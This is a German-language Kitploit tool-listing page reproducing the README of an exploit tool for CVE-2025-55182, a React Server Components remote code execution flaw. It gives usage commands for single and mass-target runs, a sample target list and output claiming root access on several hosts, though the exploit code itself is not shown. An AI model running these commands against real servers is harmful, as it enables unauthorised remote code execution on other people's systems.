Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
React2Shell — CVE-2025-55182-advanced-scanner | Kitploit
Tools/GitHubGitHub/ankitspandey07/react2shell
SchwachstellenscannerPayload-GenerierungExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlRed TeamingRemote-Access-Tool
GitHubankitspandey07/react2shell

React2Shell

CVE-2025-55182-advanced-scanner

Repository anzeigen
vor 8 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

@#React2Hell — CVE-2025-55182 Exploit

🔥 Next.js / React Server Remote Code Execution (RCE) Exploit

root@kitploit:~
█████▄  ▄▄▄▄▄  ▄▄▄   ▄▄▄▄ ▄▄▄▄▄▄ ████▄ ▄▄▄▄▄  ██  ██ ▄▄▄▄▄ ▄▄    ▄▄    
██▄▄██▄ ██▄▄  ██▀██ ██▀▀▀   ██    ▄██▀ ██▄▄   ██████ ██▄▄  ██    ██    
██   ██ ██▄▄▄ ██▀██ ▀████   ██   ███▄▄ ▄▄▄███ ██  ██ ██▄▄▄ ██▄▄▄ ██▄▄▄ 
                                                                
{MAGENTA} Next.js/React Server RCE Exploit — CVE-2025-55182
 Autor: Ankit Pandey GitHub: https://github.com/ankitspandey07
    🚀  React2Shell — Sicherheitstest-Dienstprogramm  🚀

════════════════════════════════════════════════════════════════════════
usage: new.py [-h] [-u URL] [-l LIST] -c COMMAND [--proxy PROXY] [--proxy-https PROXY_HTTPS]

🚀 Übersicht

React2Hell ist ein leistungsstarkes Exploitation-Tool, das zum Testen und Ausnutzen von CVE-2025-55182 entwickelt wurde, einer kritischen Remote Code Execution-Sicherheitslücke, die Next.js & React Server Actions betrifft.

Eine Pre-Authentication Remote Code Execution-Sicherheitslücke existiert in React Server Components Versionen 19.0.0, 19.1.0, 19.1.1 und 19.2.0 einschließlich der folgenden Pakete: react-server-dom-parcel, react-server-dom-turbopack und react-server-dom-webpack. Der anfällige Code deserialisiert unsicher Nutzlasten aus HTTP-Anfragen an Server Function-Endpunkte.


✨ Funktionen

  • 🧨 Remote Code Execution (RCE)
  • 🌐 Einzel-URL / Massen-URL-Scan
  • 🧩 Benutzerdefinierte Befehlsausführung
Tool herunterladen
  • 🕵️‍♂️ Stealth-Modus mit Proxy-Unterstützung
  • ⚡ Schnell, zuverlässig und einfach zu bedienen

  • 📌 Verwendung

    Einzelziel-Modus

    root@kitploit:~
    python Scanner.py -u https://target.com -c "whoami"
    

    Mehrere Ziele (aus Datei)

    root@kitploit:~
    python Scanner.py -l urls.txt -c "whoami"
    

    Mit HTTP-Proxy (Burp Suite)

    root@kitploit:~
    python Scanner.py -u https://target.com -c "whoami" --proxy 127.0.0.1:8080
    

    Mit HTTPS-Proxy

    root@kitploit:~
    python Scanner.py -u https://target.com -c "whoami" --proxy-https 127.0.0.1:8080
    

    📁 urls.txt Beispiel

    root@kitploit:~
    http://site1.com
    https://site2.com
    http://192.168.1.10:3000
    

    🖥️ Beispielausgabe

    root@kitploit:~
    PS D:\Ankitspandey07\React2Hell> python.exe .\Scanner.py -l .\list.txt -c whoami
    
    
    █████▄  ▄▄▄▄▄  ▄▄▄   ▄▄▄▄ ▄▄▄▄▄▄ ████▄ ▄▄▄▄▄  ██  ██ ▄▄▄▄▄ ▄▄    ▄▄    
    ██▄▄██▄ ██▄▄  ██▀██ ██▀▀▀   ██    ▄██▀ ██▄▄   ██████ ██▄▄  ██    ██    
    ██   ██ ██▄▄▄ ██▀██ ▀████   ██   ███▄▄ ▄▄▄███ ██  ██ ██▄▄▄ ██▄▄▄ ██▄▄▄ 
                                                                    
    {MAGENTA} Next.js/React Server RCE Exploit — CVE-2025-55182
     Autor: Ankit Pandey GitHub: https://github.com/ankitspandey07
        🚀  React2Shell — Sicherheitstest-Dienstprogramm  🚀
    
    ════════════════════════════════════════════════════════════════════════
    [+] 3 Ziele geladen
    ════════════════════════════════════════════════════════════════════════
    
    [→] Ziel: http://evil.com:3113/
    [→] Ausführung:   whoami
    [✓] VERWUNDBAR — RCE erfolgreich!
    ------------------------------------------------------------
    root
    ------------------------------------------------------------
    ────────────────────────────────────────────────────────────────────────
    
    [→] Ziel: http://example.lab:2000/
    [→] Ausführung:   whoami
    [✗] Nicht verwundbar — Status: 200
    ────────────────────────────────────────────────────────────────────────
    
    [→] Ziel: https://tale.lab:3000/
    [→] Ausführung:   whoami
    [✓] VERWUNDBAR — RCE erfolgreich!
    ------------------------------------------------------------
    win-1fl835ovldc\administrator
    ------------------------------------------------------------
    ────────────────────────────────────────────────────────────────────────
    [✓] Scan abgeschlossen — Verwundbar: 2
    PS D:\Ankitspandey07\React2Hell>
    

    ⚠️ Haftungsausschluss

    Dieses Tool wurde ausschließlich zu Bildungs- und Sicherheitsforschungszwecken erstellt. Verwenden Sie es nicht auf Systemen ohne ausdrückliche Genehmigung. Sie sind für Ihre eigenen Handlungen verantwortlich.


    ⭐ Unterstützen Sie das Projekt

    Wenn dieser Exploit Ihnen geholfen hat, hinterlassen Sie bitte einen ⭐ auf GitHub ❤️


    👤 Autor

    Ankit Pandey; GitHub: https://github.com/Ankitspandey07

    Erstellt mit 🔥 von jemandem, der ein stolzer und leidenschaftlicher Pentester ist und bei jedem Schritt danach strebt, zu lernen.